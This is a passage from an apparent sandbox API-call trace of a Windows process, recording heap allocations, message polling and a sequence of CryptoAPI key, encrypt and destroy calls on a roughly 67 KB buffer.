Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0035.483] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0035.484] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.484] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.484] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.484] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.484] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.484] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.484] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.484] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.484] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.484] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.484] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0035.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.484] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.484] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.485] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.485] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.485] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.485] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.485] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.485] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.485] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.485] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.485] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.485] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.485] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.487] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x106e8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x106f0) returned 1 [0035.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.487] CharLowerBuffW (in: lpsz="byte[67313]", cchLength=0xb | out: lpsz="byte[67313]") returned 0xb [0035.487] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.489] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.490] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.490] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x106e8, dwBufLen=0x106f0 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x106f0) returned 1 [0035.491] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.491] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.491] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.493] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.493] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.493] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.493] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.493] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.493] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.493] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.493] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0035.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.500] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.504] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.504] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.504] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.504] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.504] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.504] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.505] CryptDestroyKey (hKey=0x7c2280) returned 1 [0035.505] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.505] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.505] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.505] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.505] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.505] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.505] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.505] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.505] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.505] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.506] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.506] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.506] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.506] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.506] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.506] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.506] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.506] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.506] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.506] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.506] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.506] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.507] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.507] CharLowerBuffW (in: lpsz="bool", 